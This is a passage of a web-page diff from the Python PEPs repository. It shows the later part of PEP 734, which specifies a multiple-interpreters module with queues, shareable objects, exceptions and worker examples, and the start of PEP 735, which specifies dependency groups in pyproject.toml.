    Create a new interpreter and return the Interpreter object +for it. The interpreter doesn’t do anything on its own and is +not inherently tied to any OS thread. That only happens when +something is actually run in the interpreter +(e.g. Interpreter.exec()), and only while running. +The interpreter may or may not have thread states ready to use, +but that is strictly an internal implementation detail.
    +
    +
  • +
+
+
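A minimal sketch of these functions used together, with the module exactly as specified in this proposal:

import interpreters

interp = interpreters.create()              # a new, idle interpreter
print(interp.id)                            # non-negative int, like a process ID
print(interp in interpreters.list_all())    # True; one object per interpreter
print(interpreters.get_current().id)        # the interpreter running this code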
+

Interpreter Objects

+

An interpreters.Interpreter object represents the interpreter (PyInterpreterState) with the corresponding unique ID. There will only be one object for any given interpreter.

+

If the interpreter was created with interpreters.create() then +it will be destroyed as soon as all Interpreter objects with its ID +(across all interpreters) have been deleted.

+

Interpreter objects may represent other interpreters than those +created by interpreters.create(). Examples include the main +interpreter (created by Python’s runtime initialization) and those +created via the C-API, using Py_NewInterpreter(). Such +Interpreter objects will not be able to interact with their +corresponding interpreters, e.g. via Interpreter.exec() +(though we may relax this in the future).

+

Attributes and methods:

+
    +
  • +
    id
    (read-only) A non-negative int that identifies the +interpreter that this Interpreter instance represents. +Conceptually, this is similar to a process ID.
    +
    +
  • +
  • +
    __hash__()
    Returns the hash of the interpreter’s id. This is the same +as the hash of the ID’s integer value.
    +
    +
  • +
  • +
    is_running() -> bool
    Returns True if the interpreter is currently executing code +in its __main__ module. This excludes sub-threads.

It refers only to whether there is an OS thread running a script (code) in the interpreter’s __main__ module. That basically means whether or not Interpreter.exec() is running in some OS thread. Code running in sub-threads is ignored.

    +
    +
    +
  • +
  • +
    prepare_main(**kwargs)
    Bind one or more objects in the interpreter’s __main__ module.

    The keyword argument names will be used as the attribute names. +The values will be bound as new objects, though exactly equivalent +to the original. Only objects specifically supported for passing +between interpreters are allowed. See Shareable Objects.

    +

    prepare_main() is helpful for initializing the +globals for an interpreter before running code in it.

    +
    +
    +
  • +
  • +
    exec(code, /)
    Execute the given source code in the interpreter +(in the current OS thread), using its __main__ module. +It doesn’t return anything.

    This is essentially equivalent to switching to this interpreter +in the current OS thread and then calling the builtin exec() +using this interpreter’s __main__ module’s __dict__ as +the globals and locals.

    +

    The code running in the current OS thread (a different +interpreter) is effectively paused until Interpreter.exec() +finishes. To avoid pausing it, create a new threading.Thread +and call Interpreter.exec() in it +(like Interpreter.call_in_thread() does).

    +

    Interpreter.exec() does not reset the interpreter’s state nor +the __main__ module, neither before nor after, so each +successive call picks up where the last one left off. This can +be useful for running some code to initialize an interpreter +(e.g. with imports) before later performing some repeated task.

    +

    If there is an uncaught exception, it will be propagated into +the calling interpreter as an ExecutionFailed. The full error +display of the original exception, generated relative to the +called interpreter, is preserved on the propagated ExecutionFailed. +That includes the full traceback, with all the extra info like +syntax error details and chained exceptions. +If the ExecutionFailed is not caught then that full error display +will be shown, much like it would be if the propagated exception +had been raised in the main interpreter and uncaught. Having +the full traceback is particularly useful when debugging.

    +

    If exception propagation is not desired then an explicit +try-except should be used around the code passed to +Interpreter.exec(). Likewise any error handling that depends +on specific information from the exception must use an explicit +try-except around the given code, since ExecutionFailed +will not preserve that information.

    +
    +
    +
  • +
  • +
    call(callable, /)
    Call the callable object in the interpreter. +The return value is discarded. If the callable raises an exception +then it gets propagated as an ExecutionFailed exception, +in the same way as Interpreter.exec().

    For now only plain functions are supported and only ones that +take no arguments and have no cell vars. Free globals are resolved +against the target interpreter’s __main__ module.

    +

    In the future, we can add support for arguments, closures, +and a broader variety of callables, at least partly via pickle. +We can also consider not discarding the return value. +The initial restrictions are in place to allow us to get the basic +functionality of the module out to users sooner.

    +
    +
    +
  • +
  • +
    call_in_thread(callable, /) -> threading.Thread
    Essentially, apply Interpreter.call() in a new thread. +Return values are discarded and exceptions are not propagated.

    call_in_thread() is roughly equivalent to:

    +
    def task():
    +    interp.call(func)
    +t = threading.Thread(target=task)
    +t.start()
    +
    +
    +
    +
    +
  • +
  • +
    close()
    Destroy the underlying interpreter.
    +
    +
  • +
+
+
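A sketch tying these methods together (names and semantics as specified above; the ExecutionFailed attributes used here are described under Exceptions below):

import interpreters

interp = interpreters.create()
interp.prepare_main(name='world')     # bind "name" in the interpreter's __main__
try:
    interp.exec("print(f'hello, {name}')")
    interp.exec("1/0")                # an uncaught error propagates...
except interpreters.ExecutionFailed as exc:
    print(exc.type.__name__)          # ...as ExecutionFailed: 'ZeroDivisionError'
finally:
    interp.close()                    # destroy the underlying interpreter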
+

Communicating Between Interpreters

+

The module introduces a basic communication mechanism through special +queues.

+

There are interpreters.Queue objects, but they only proxy +the actual data structure: an unbounded FIFO queue that exists +outside any one interpreter. These queues have special accommodations +for safely passing object data between interpreters, without violating +interpreter isolation. This includes thread-safety.

+

As with other queues in Python, for each “put” the object is added to +the back and each “get” pops the next one off the front. Every added +object will be popped off in the order it was pushed on.

+

Only objects that are specifically supported for passing +between interpreters may be sent through an interpreters.Queue. +Note that the actual objects aren’t sent, but rather their +underlying data. However, the popped object will still be +strictly equivalent to the original. +See Shareable Objects.

+

The module defines the following functions:

+
    +
  • +
    create_queue(maxsize=0, *, syncobj=False) -> Queue
    Create a new queue. If the maxsize is zero or negative then the +queue is unbounded.

    “syncobj” is used as the default for put() and put_nowait().

    +
    +
    +
  • +
+
+
+

Queue Objects

+

interpreters.Queue objects act as proxies for the underlying +cross-interpreter-safe queues exposed by the interpreters module. +Each Queue object represents the queue with the corresponding +unique ID. +There will only be one object for any given queue.

+

Queue implements all the methods of queue.Queue except for +task_done() and join(), hence it is similar to +asyncio.Queue and multiprocessing.Queue.

+

Attributes and methods:

+
    +
  • +
    id
    (read-only) A non-negative int that identifies +the corresponding cross-interpreter queue. +Conceptually, this is similar to the file descriptor +used for a pipe.
    +
    +
  • +
  • +
    maxsize
    (read-only) Number of items allowed in the queue. +Zero means “unbounded”.
    +
    +
  • +
  • +
    __hash__()
    Return the hash of the queue’s id. This is the same +as the hash of the ID’s integer value.
    +
    +
  • +
  • +
    empty()
    Return True if the queue is empty, False otherwise.

    This is only a snapshot of the state at the time of the call. +Other threads or interpreters may cause this to change.

    +
    +
    +
  • +
  • +
    full()
    Return True if there are maxsize items in the queue.

    If the queue was initialized with maxsize=0 (the default), +then full() never returns True.

    +

    This is only a snapshot of the state at the time of the call. +Other threads or interpreters may cause this to change.

    +
    +
    +
  • +
  • +
    qsize()
    Return the number of items in the queue.

    This is only a snapshot of the state at the time of the call. +Other threads or interpreters may cause this to change.

    +
    +
    +
  • +
  • +
    put(obj, timeout=None, *, syncobj=None)
    Add the object to the queue.

If maxsize > 0 and the queue is full then this blocks until a free slot is available. If timeout is a positive number then it blocks at most that many seconds and then raises interpreters.QueueFull. Otherwise it blocks forever.

    +

    If “syncobj” is true then the object must be +shareable, which means the object’s data +is passed through rather than the object itself. +If “syncobj” is false then all objects are supported. However, +there are some performance penalties and all objects are copies +(e.g. via pickle). Thus mutable objects will never be +automatically synchronized between interpreters. +If “syncobj” is None (the default) then the queue’s default +value is used.

    +

    If an object is still in the queue, and the interpreter which put +it in the queue (i.e. to which it belongs) is destroyed, then the +object is immediately removed from the queue. (We may later add +an option to replace the removed object in the queue with a +sentinel or to raise an exception for the corresponding get() +call.)

    +
    +
    +
  • +
  • +
    put_nowait(obj, *, syncobj=None)
    Like put() but effectively with an immediate timeout. +Thus if the queue is full, it immediately raises +interpreters.QueueFull.
    +
    +
  • +
  • +
    get(timeout=None) -> object
    Pop the next object from the queue and return it. Block while +the queue is empty. If a positive timeout is provided and an +object hasn’t been added to the queue in that many seconds +then raise interpreters.QueueEmpty.
    +
    +
  • +
  • +
    get_nowait() -> object
    Like get(), but do not block. If the queue is not empty +then return the next item. Otherwise, raise +interpreters.QueueEmpty.
    +
    +
  • +
+
+
+
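A sketch of passing data through a queue, per the API above (the queue itself is shared with the other interpreter via prepare_main(), as described under Shareable Objects below):

import interpreters

queue = interpreters.create_queue()
interp = interpreters.create()
interp.prepare_main(queue=queue)      # both interpreters now proxy the same queue
interp.exec("queue.put('spam', syncobj=True)")
print(queue.get())                    # 'spam'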

Shareable Objects

+

Interpreter.prepare_main() only works with “shareable” objects. +The same goes for interpreters.Queue (optionally).

+

A “shareable” object is one which may be passed from one interpreter +to another. The object is not necessarily actually directly shared +by the interpreters. However, even if it isn’t, the shared object +should be treated as though it were shared directly. That’s a +strong equivalence guarantee for all shareable objects. +(See below.)

+

For some types (builtin singletons), the actual object is shared. +For some, the object’s underlying data is actually shared but each +interpreter has a distinct object wrapping that data. For all other +shareable types, a strict copy or proxy is made such that the +corresponding objects continue to match exactly. In cases where +the underlying data is complex but must be copied (e.g. tuple), +the data is serialized as efficiently as possible.

+

Shareable objects must be specifically supported internally +by the Python runtime. However, there is no restriction against +adding support for more types later.

+

Here’s the initial list of supported objects:

+
    +
  • str
  • +
  • bytes
  • +
  • int
  • +
  • float
  • +
  • bool (True/False)
  • +
  • None
  • +
  • tuple (only with shareable items)
  • +
  • interpreters.Queue
  • +
  • memoryview (underlying buffer actually shared)
  • +
+

Note that the last two on the list, queues and memoryview, are +technically mutable data types, whereas the rest are not. When any +interpreters share mutable data there is always a risk of data races. +Cross-interpreter safety, including thread-safety, is a fundamental +feature of queues.

+

However, memoryview does not have any native accommodations. +The user is responsible for managing thread-safety, whether passing +a token back and forth through a queue to indicate safety +(see Synchronization), or by assigning sub-range exclusivity +to individual interpreters.

+

Most objects will be shared through queues (interpreters.Queue), +as interpreters communicate information between each other. +Less frequently, objects will be shared through prepare_main() +to set up an interpreter prior to running code in it. However, +prepare_main() is the primary way that queues are shared, +to provide another interpreter with a means +of further communication.

+

Finally, a reminder: for a few types the actual object is shared, +whereas for the rest only the underlying data is shared, whether +as a copy or through a proxy. Regardless, it always preserves +the strong equivalence guarantee of “shareable” objects.

+

The guarantee is that a shared object in one interpreter is strictly +equivalent to the corresponding object in the other interpreter. +In other words, the two objects will be indistinguishable from each +other. The shared object should be treated as though the original +had been shared directly, whether or not it actually was. +That’s a slightly different and stronger promise than just equality.

+

The guarantee is especially important for mutable objects, like +Interpreters.Queue and memoryview. Mutating the object +in one interpreter will always be reflected immediately in every +other interpreter sharing the object.
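To make the guarantee concrete, a small sketch (shown within one interpreter for brevity; the same equivalence holds when the get() happens in a different interpreter):

import interpreters

q = interpreters.create_queue()
q.put(('spam', 42), syncobj=True)     # the tuple's data is serialized and copied
print(q.get() == ('spam', 42))        # True: strictly equivalent to the original

For memoryview, by contrast, the underlying buffer itself is shared, so a write made through the view in one interpreter is immediately visible through the corresponding view in another.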

+
+
+

Synchronization

+

There are situations where two interpreters should be synchronized. +That may involve sharing a resource, worker management, or preserving +sequential consistency.

+

In threaded programming the typical synchronization primitives are +types like mutexes. The threading module exposes several. +However, interpreters cannot share objects which means they cannot +share threading.Lock objects.

+

The interpreters module does not provide any such dedicated +synchronization primitives. Instead, interpreters.Queue +objects provide everything one might need.

+

For example, if there’s a shared resource that needs managed +access then a queue may be used to manage it, where the interpreters +pass an object around to indicate who can use the resource:

+
import interpreters
+import threading
+from mymodule import load_big_data, check_data
+
+numworkers = 10
+control = interpreters.create_queue()
+data = memoryview(load_big_data())
+
+def worker():
+    interp = interpreters.create()
+    interp.prepare_main(control=control, data=data)
+    interp.exec("""if True:
+        from mymodule import edit_data
+        while True:
+            token = control.get()
+            edit_data(data)
+            control.put(token)
+        """)
+threads = [threading.Thread(target=worker) for _ in range(numworkers)]
+for t in threads:
+    t.start()
+
+token = 'football'
+control.put(token)
+while True:
+    control.get()
+    if not check_data(data):
+        break
+    control.put(token)
+
+
+
+
+

Exceptions

+
  • InterpreterError
    Indicates that some interpreter-related failure occurred.
    This exception is a subclass of Exception.
  • InterpreterNotFoundError
    Raised from Interpreter methods after the underlying interpreter has been destroyed, e.g. via the C-API.
    This exception is a subclass of InterpreterError.
  • ExecutionFailed
    Raised from Interpreter.exec() and Interpreter.call() when there's an uncaught exception. The error display for this exception includes the traceback of the uncaught exception, which gets shown after the normal error display, much like happens for ExceptionGroup.
    Attributes:
      • type - a representation of the original exception's class, with __name__, __module__, and __qualname__ attrs.
      • msg - str(exc) of the original exception
      • snapshot - a traceback.TracebackException object for the original exception
    This exception is a subclass of InterpreterError.
  • QueueError
    Indicates that some queue-related failure occurred.
    This exception is a subclass of Exception.
  • QueueNotFoundError
    Raised from interpreters.Queue methods after the underlying queue has been destroyed.
    This exception is a subclass of QueueError.
  • QueueEmpty
    Raised from Queue.get() (or get_nowait() with no default) when the queue is empty.
    This exception is a subclass of both QueueError and the stdlib queue.Empty.
  • QueueFull
    Raised from Queue.put() (with a timeout) or put_nowait() when the queue is already at its max size.
    This exception is a subclass of both QueueError and the stdlib queue.Full.
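For example, here is a sketch of how an uncaught exception in a subinterpreter surfaces as ExecutionFailed with the attributes listed above (assuming the proposed module):

import interpreters

interp = interpreters.create()
try:
    interp.exec("raise ValueError('bad value')")
except interpreters.ExecutionFailed as exc:
    # The original exception is summarized rather than raised directly.
    print(exc.type.__name__)  # ValueError
    print(exc.msg)            # bad value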
+
+
+

InterpreterPoolExecutor

+

Along with the new interpreters module, there will be a new +concurrent.futures.InterpreterPoolExecutor. It will be a +derivative of ThreadPoolExecutor, where each worker executes +in its own thread, but each with its own subinterpreter.

+

Like the other executors, InterpreterPoolExecutor will support +callables for tasks, and for the initializer. Also like the other +executors, the arguments in both cases will be mostly unrestricted. +The callables and arguments will typically be serialized when sent +to a worker’s interpreter, e.g. with pickle, like how the +ProcessPoolExecutor works. This contrasts with +Interpreter.call(), which will (at least initially) +be much more restricted.

+

Communication between workers, or between the executor +(or generally its interpreter) and the workers, may still be done +through interpreters.Queue objects, set with the initializer.
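A sketch of what usage might look like, assuming the new executor mirrors the existing concurrent.futures interface (it is proposed here, not yet available):

from concurrent.futures import InterpreterPoolExecutor

def fib(n):
    # CPU-bound work that can run in parallel, since each worker
    # runs in its own subinterpreter (and thus with its own GIL).
    return n if n < 2 else fib(n - 1) + fib(n - 2)

with InterpreterPoolExecutor(max_workers=4) as executor:
    # The callable and arguments are serialized (e.g. with pickle)
    # when sent to each worker's interpreter.
    print(list(executor.map(fib, range(20))))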

+
+
+

sys.implementation.supports_isolated_interpreters

+

Python implementations are not required to support subinterpreters, +though most major ones do. If an implementation does support them +then sys.implementation.supports_isolated_interpreters will be +set to True. Otherwise it will be False. If the feature +is not supported then importing the interpreters module will +raise an ImportError.
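For example, code that wants to degrade gracefully might check the flag before importing the module (a sketch; getattr() guards against older implementations that predate the attribute):

import sys

if getattr(sys.implementation, "supports_isolated_interpreters", False):
    import interpreters
else:
    interpreters = None  # fall back to threads or processes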

+
+
+

Examples

+

The following examples demonstrate practical cases where multiple +interpreters may be useful.

+

Example 1:

+

There’s a stream of requests coming in that will be handled +via workers in sub-threads.

+
    +
  • each worker thread has its own interpreter
  • +
  • there’s one queue to send tasks to workers and +another queue to return results
  • +
  • the results are handled in a dedicated thread
  • +
  • each worker keeps going until it receives a “stop” sentinel (None)
  • +
  • the results handler keeps going until all workers have stopped
  • +
+
import interpreters
+import threading
+from mymodule import iter_requests, handle_result
+
+tasks = interpreters.create_queue()
+results = interpreters.create_queue()
+
+numworkers = 20
+threads = []
+
+def results_handler():
+    running = numworkers
+    while running:
+        try:
+            res = results.get(timeout=0.1)
+        except interpreters.QueueEmpty:
+            # No workers have finished a request since last time.
+            pass
+        else:
+            if res is None:
+                # A worker has stopped.
+                running -= 1
+            else:
+                handle_result(res)
+    empty = object()
+    assert results.get_nowait(empty) is empty
+threads.append(threading.Thread(target=results_handler))
+
+def worker():
+    interp = interpreters.create()
+    interp.prepare_main(tasks=tasks, results=results)
+    interp.exec("""if True:
+        from mymodule import handle_request, capture_exception
+
+        while True:
+            req = tasks.get()
+            if req is None:
+                # Stop!
+                break
+            try:
+                res = handle_request(req)
+            except Exception as exc:
+                res = capture_exception(exc)
+            results.put(res)
+        # Notify the results handler.
+        results.put(None)
+        """)
+threads.extend(threading.Thread(target=worker) for _ in range(numworkers))
+
+for t in threads:
+    t.start()
+
+for req in iter_requests():
+    tasks.put(req)
+# Send the "stop" signal.
+for _ in range(numworkers):
+    tasks.put(None)
+
+for t in threads:
+    t.join()
+
+
+

Example 2:

+

This case is similar to the last as there are a bunch of workers +in sub-threads. However, this time the code is chunking up a big array +of data, where each worker processes one chunk at a time. Copying +that data to each interpreter would be exceptionally inefficient, +so the code takes advantage of directly sharing memoryview buffers.

+
    +
  • all the interpreters share the buffer of the source array
  • +
  • each one writes its results to a second shared buffer
  • +
  • there’s use a queue to send tasks to workers
  • +
  • only one worker will ever read any given index in the source array
  • +
  • only one worker will ever write to any given index in the results +(this is how it ensures thread-safety)
  • +
+
import interpreters
+import threading
+from mymodule import read_large_data_set, use_results
+
+numworkers = 3
+data, chunksize = read_large_data_set()
+buf = memoryview(data)
+numchunks = (len(buf) + chunksize - 1) // chunksize
+results = memoryview(bytearray(numchunks))
+
+tasks = interpreters.create_queue()
+
+def worker():
+    interp = interpreters.create()
+    interp.prepare_main(data=buf, results=results, tasks=tasks)
+    interp.exec("""if True:
+        from mymodule import reduce_chunk
+
+        while True:
+            req = tasks.get()
+            if req is None:
+                # Stop!
+                break
+            resindex, start, end = req
+            chunk = data[start: end]
+            res = reduce_chunk(chunk)
+            results[resindex] = res
+        """)
+threads = [threading.Thread(target=worker) for _ in range(numworkers)]
+for t in threads:
+    t.start()
+
+for i in range(numchunks):
+    # Assume there's at least one worker running still.
+    start = i * chunksize
+    end = start + chunksize
+    if end > len(buf):
+        end = len(buf)
+    tasks.put((i, start, end))
+# Send the "stop" signal.
+for _ in range(numworkers):
+    tasks.put(None)
+
+for t in threads:
+    t.join()
+
+use_results(results)
+
+
+
+
+
+

Rationale

+
+

A Minimal API

+

Since the core dev team has no real experience with +how users will make use of multiple interpreters in Python code, this +proposal purposefully keeps the initial API as lean and minimal as +possible. The objective is to provide a well-considered foundation +on which further (more advanced) functionality may be added later, +as appropriate.

+

That said, the proposed design incorporates lessons learned from +existing use of subinterpreters by the community, from existing stdlib +modules, and from other programming languages. It also factors in +experience from using subinterpreters in the CPython test suite and +using them in concurrency benchmarks.

+
+
+

create(), create_queue()

+

Typically, users call a type to create instances of the type, at which point the object's resources get provisioned. The interpreters module takes a different approach, where users must call create() to get a new interpreter or create_queue() for a new queue. Calling interpreters.Interpreter() directly only returns a wrapper around an existing interpreter (likewise for interpreters.Queue()).

+

This is because interpreters (and queues) are special resources. +They exist globally in the process and are not managed/owned by the +current interpreter. Thus the interpreters module makes creating +an interpreter (or queue) a visibly distinct operation from creating +an instance of interpreters.Interpreter +(or interpreters.Queue).
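A sketch of the distinction, assuming (per this proposal) that Interpreter accepts an existing interpreter's ID:

import interpreters

interp = interpreters.create()                 # provisions a new interpreter
wrapper = interpreters.Interpreter(interp.id)  # merely wraps the existing one
assert wrapper.id == interp.id                 # same underlying interpreter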

+
+
+

Interpreter.prepare_main() Sets Multiple Variables

+

prepare_main() may be seen as a setter function of sorts. +It supports setting multiple names at once, +e.g. interp.prepare_main(spam=1, eggs=2), whereas most setters +set one item at a time. The main reason is for efficiency.

+

To set a value in the interpreter’s __main__.__dict__, the +implementation must first switch the OS thread to the identified +interpreter, which involves some non-negligible overhead. After +setting the value it must switch back. +Furthermore, there is some additional overhead to the mechanism +by which it passes objects between interpreters, which can be +reduced in aggregate if multiple values are set at once.

+

Therefore, prepare_main() supports setting multiple +values at once.
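In other words, a single call amortizes the switching cost across all of the values (a sketch):

import interpreters

interp = interpreters.create()
# One switch to the target interpreter covers all three bindings...
interp.prepare_main(spam=1, eggs=2, ham=3)
# ...instead of three separate switches:
# interp.prepare_main(spam=1)
# interp.prepare_main(eggs=2)
# interp.prepare_main(ham=3)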

+
+
+

Propagating Exceptions

+

An uncaught exception from a subinterpreter, +via Interpreter.exec(), +could either be (effectively) ignored, +like threading.Thread() does, +or propagated, like the builtin exec() does. +Since Interpreter.exec() is a synchronous operation, +like the builtin exec(), uncaught exceptions are propagated.

+

However, such exceptions are not raised directly. That’s because +interpreters are isolated from each other and must not share objects, +including exceptions. That could be addressed by raising a surrogate +of the exception, whether a summary, a copy, or a proxy that wraps it. +Any of those could preserve the traceback, which is useful for +debugging. The ExecutionFailed that gets raised +is such a surrogate.

+

There’s another concern to consider. If a propagated exception isn’t +immediately caught, it will bubble up through the call stack until +caught (or not). In the case that code somewhere else may catch it, +it is helpful to identify that the exception came from a subinterpreter +(i.e. a “remote” source), rather than from the current interpreter. +That’s why Interpreter.exec() raises ExecutionFailed and why +it is a plain Exception, rather than a copy or proxy with a class +that matches the original exception. For example, an uncaught +ValueError from a subinterpreter would never get caught in a later +try: ... except ValueError: .... Instead, ExecutionFailed +must be handled directly.

+

In contrast, exceptions propagated from Interpreter.call() do not +involve ExecutionFailed but are raised directly, as though originating +in the calling interpreter. This is because Interpreter.call() is +a higher level method that uses pickle to support objects that can’t +normally be passed between interpreters.

+
+
+

Limited Object Sharing

+

As noted in Interpreter Isolation, only a small number of builtin +objects may be truly shared between interpreters. In all other cases +objects can only be shared indirectly, through copies or proxies.

+

The set of objects that are shareable as copies through queues +(and Interpreter.prepare_main()) is limited for the sake of +efficiency.

+

Supporting sharing of all objects is possible (via pickle) +but not part of this proposal. For one thing, it’s helpful to know +in those cases that only an efficient implementation is being used. +Furthermore, in those cases supporting mutable objects via pickling +would violate the guarantee that “shared” objects be equivalent +(and stay that way).

+
+
+

Objects vs. ID Proxies

+

For both interpreters and queues, the low-level module makes use of +proxy objects that expose the underlying state by their corresponding +process-global IDs. In both cases the state is likewise process-global +and will be used by multiple interpreters. Thus they aren’t suitable +to be implemented as PyObject, which is only really an option for +interpreter-specific data. That’s why the interpreters module +instead provides objects that are weakly associated through the ID.

+
+
+
+

Rejected Ideas

+

See PEP 554.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0734.rst

+

Last modified: 2024-04-10 21:49:06 GMT

+ +
+ +
+ \ No newline at end of file diff --git a/pep-0735/index.html b/pep-0735/index.html new file mode 100644 index 00000000000..c8f7e07281d --- /dev/null +++ b/pep-0735/index.html @@ -0,0 +1,1515 @@ +PEP 735 – Dependency Groups in pyproject.toml | peps.python.org
+
+


+ + +
+
+
+

PEP 735 – Dependency Groups in pyproject.toml

+
+
Author:
+
Stephen Rosen <sirosen0 at gmail.com>
+
Sponsor:
+
Brett Cannon <brett at python.org>
+
PEP-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Accepted
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
20-Nov-2023
+
Post-History:
+
14-Nov-2023, 20-Nov-2023
+
Resolution:
+
10-Oct-2024
+
+
+
+
+
+

Abstract

+

This PEP specifies a mechanism for storing package requirements in +pyproject.toml files such that they are not included in any built distribution of +the project.

+

This is suitable for creating named groups of dependencies, similar to +requirements.txt files, which launchers, IDEs, and other tools can find and +identify by name.

+

The feature defined here is referred to as “Dependency Groups”.

+
+
+

Motivation

+

There are two major use cases for which the Python community has no +standardized answer:

+
    +
  • How should development dependencies be defined for packages?
  • +
  • How should dependencies be defined for projects which do not build +distributions (non-package projects)?
  • +
+

In support of these two needs, there are two common solutions which are similar +to this proposal:

+
    +
  • requirements.txt files
  • +
  • package extras
  • +
+

Both requirements.txt files and extras have limitations which this +standard seeks to overcome.

+

Note that the two use cases above describe two different types of projects +which this PEP seeks to support:

+
    +
  • Python packages, such as libraries
  • +
  • non-package projects, such as data science projects
  • +
+

Several motivating use cases are defined in detail in the Use Cases Appendix.

+
+

Limitations of requirements.txt files

+

Many projects may define one or more requirements.txt files, +and may arrange them either at the project root (e.g. requirements.txt and +test-requirements.txt) or else in a directory (e.g. +requirements/base.txt and requirements/test.txt). However, there are +major issues with the use of requirements files in this way:

+
    +
  • There is no standardized naming convention such that tools can discover or +use these files by name.
  • +
  • requirements.txt files are not standardized, but instead provide +options to pip.
  • +
+

As a result, it is difficult to define tool behaviors based on +requirements.txt files. They are not trivial to discover or identify by +name, and their contents may contain a mix of package specifiers and additional +pip options.

+

The lack of a standard for requirements.txt contents also means they are +not portable to any alternative tools which wish to process them other than +pip.

+

Additionally, requirements.txt files require a file per dependency list. +For some use-cases, this makes the marginal cost of dependency groupings high, +relative to their benefit. +A terser declaration is beneficial to projects with a number of small groups of +dependencies.

+

In contrast with this, Dependency Groups are defined at a well known location +in pyproject.toml with fully standardized contents. Not only will they have +immediate utility, but they will also serve as a starting point for future +standards.

+
+
+

Limitations of extras

+

extras are additional package metadata declared in the +[project.optional-dependencies] table. They provide names for lists of +package specifiers which are published as part of a package’s metadata, and +which a user can request under that name, as in pip install 'foo[bar]' to +install foo with the bar extra.

+

Because extras are package metadata, they are not guaranteed to be +statically defined and may require a build system to resolve. +Furthermore, definition of a [project.optional-dependencies] indicates to +many tools that a project is a package, and may drive tool behaviors such as +validation of the [project] table.

+

For projects which are packages, extras are a common solution for defining +development dependencies, but even under these circumstances they have +downsides:

+
    +
  • Because an extra defines optional additional dependencies, it is not +possible to install an extra without installing the current package and +its dependencies.
  • +
  • Because they are user-installable, extras are part of the public interface +for packages. Because extras are published, package developers often are +concerned about ensuring that their development extras are not confused with +user-facing extras.
  • +
+
+
+
+

Rationale

+

This PEP defines the storage of requirements data in lists within a +[dependency-groups] table. +This name was chosen to match the canonical name of the feature +(“Dependency Groups”).

+

This format should be as simple and learnable as possible, having a format +very similar to existing requirements.txt files for many cases. Each list +in [dependency-groups] is defined as a list of package specifiers. For +example:

+
[dependency-groups]
+test = ["pytest>7", "coverage"]
+
+
+

There are a number of use cases for requirements.txt files which require +data which cannot be expressed in PEP 508 dependency specifiers. Such +fields are not valid in Dependency Groups. Including many of the data and +fields which pip supports, such as index servers, hashes, and path +dependencies, requires new standards. This standard leaves room for new +standards and developments, but does not attempt to support all valid +requirements.txt contents.

+

The only exception to this is the -r flag which requirements.txt files +use to include one file in another. Dependency Groups support an “include” +mechanism which is similar in meaning, allowing one dependency group to extend +another.

+

Dependency Groups have two additional features which are similar to +requirements.txt files:

+
    +
  • they are not published as distinct metadata in any built distribution
  • +
  • installation of a dependency group does not imply installation of a package’s +dependencies or the package itself
  • +
+
+

Use Cases

+

The following use cases are considered important targets for this PEP. They are +defined in greater detail in the Use Cases Appendix.

+
    +
  • Web Applications deployed via a non-python-packaging build process
  • +
  • Libraries with unpublished dev dependency groups
  • +
  • Data science projects with groups of dependencies but no core package
  • +
  • Input data to lockfile generation (Dependency Groups should generally not +be used as a location for locked dependency data)
  • +
  • Input data to an environment manager, such as tox, Nox, or Hatch
  • +
  • Configurable IDE discovery of test and linter requirements
  • +
+
+
+

Regarding Poetry and PDM Dependency Groups

+

The existing Poetry and PDM tools already offer a feature which each calls +“Dependency Groups”. However, absent any standard for specifying collections +of dependencies, each tool defines these in a tool-specific way, in the +relevant sections of the [tool] table.

+

(PDM also uses extras for some Dependency Groups, and overlaps the notion +heavily with extras.)

+

This PEP does not support all of the features of Poetry and PDM, which, like +requirements.txt files for pip, support several non-standard extensions +to common dependency specifiers.

+

It should be possible for such tools to use standardized Dependency Groups as +extensions of their own Dependency Group mechanisms. +However, defining a new data format which replaces the existing Poetry and PDM +solutions is a non-goal. Doing so would require standardizing several +additional features, such as path dependencies, which are supported by these +tools.

+
+
+

Dependency Groups are not Hidden Extras

+

Dependency Groups are very similar to extras which go unpublished. +However, there are two major features which distinguish them from extras +further:

+
    +
  • they support non-package projects
  • +
  • installation of a Dependency Group does not imply installation of a package’s +dependencies (or the package itself)
  • +
+
+
+

Future Compatibility & Invalid Data

+

Dependency Groups are intended to be extensible in future PEPs. +However, Dependency Groups should also be usable by multiple tools in a +single Python project. +With multiple tools using the same data, it is possible that one implements +a future PEP which extends Dependency Groups, while another does not.

+

To support users in this case, this PEP defines and recommends validation +behaviors in which tools only examine Dependency Groups which they are using. +This allows multiple tools, using different versions of Dependency Groups data, +to share a single table in pyproject.toml.

+
+
+
+

Specification

+

This PEP defines a new section (table) in pyproject.toml files named +dependency-groups. The dependency-groups table contains an arbitrary +number of user-defined keys, each of which has, as its value, a list of +requirements (defined below). These keys must be +valid non-normalized names, +and must be +normalized +before comparisons.

+

Tools SHOULD prefer to present the original, non-normalized name to users by +default. If duplicate names, after normalization, are encountered, tools SHOULD +emit an error.
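Normalization here is the usual package-name normalization rule; a minimal sketch, matching the reference implementation later in this document:

import re

def normalize(name: str) -> str:
    # Collapse runs of -, _, and . to a single dash, then lowercase.
    return re.sub(r"[-_.]+", "-", name).lower()

assert normalize("Typing_Test") == normalize("typing.test") == "typing-test"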

+

Requirement lists under dependency-groups may contain strings, tables +(“dicts” in Python), or a mix of strings and tables.

+

Strings in requirement lists must be valid +Dependency Specifiers, +as defined in PEP 508.

+

Tables in requirement lists must be valid Dependency Object Specifiers.

+
+

Dependency Object Specifiers

+

Dependency Object Specifiers are tables which define zero or more dependencies.

+

This PEP standardizes only one type of Dependency Object Specifier, a +“Dependency Group Include”. Other types may be added in future standards.

+
+

Dependency Group Include

+

A Dependency Group Include includes the dependencies of another Dependency +Group in the current Dependency Group.

+

An include is defined as a table with exactly one key, "include-group", +whose value is a string, the name of another Dependency Group.

+

For example, {include-group = "test"} is an include which expands to the +contents of the test Dependency Group.

+

Includes are defined to be exactly equivalent to the contents of the named +Dependency Group, inserted into the current group at the location of the include. +For example, if foo = ["a", "b"] is one group, and +bar = ["c", {include-group = "foo"}, "d"] is another, then bar should +evaluate to ["c", "a", "b", "d"] when Dependency Group Includes are expanded.
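That expansion rule can be sketched in a few lines of Python (ignoring cycles and validation, which the reference implementation later in this document handles):

groups = {
    "foo": ["a", "b"],
    "bar": ["c", {"include-group": "foo"}, "d"],
}

def expand(name: str) -> list[str]:
    out = []
    for item in groups[name]:
        if isinstance(item, dict):  # a Dependency Group Include
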